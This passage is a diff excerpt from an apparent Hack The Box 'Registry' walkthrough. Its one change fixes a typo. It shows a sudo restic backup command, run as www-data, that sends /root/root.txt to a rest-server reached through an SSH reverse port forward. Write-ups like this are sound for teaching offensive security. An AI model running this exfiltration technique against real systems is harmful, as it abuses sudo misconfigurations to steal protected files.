grav3m1nd-byte/grav3m1nd-byte.github.io/HTB-Retired/Registry/registry.md

 As TCP 61234 is now being used by registry.htb and rest-server is running on TCP 8000 on my localhost, let's try and run restic from registry.htb.

-We need to run the restic command as weas www-data using *http://127.0.0.1:61234/* and try to exfiltrate the *root.txt* file using the port opened previously through SSH Remote Port Forwarding (used in the Restic Server URL).
+We need to run the restic command as www-data using *http://127.0.0.1:61234/* and try to exfiltrate the *root.txt* file using the port opened previously through SSH Remote Port Forwarding (used in the Restic Server URL).

 ```
 www-data@bolt:~/html/bolt/theme$ sudo /usr/bin/restic backup -r rest:http://127.0.0.1:61234/ /root/root.txt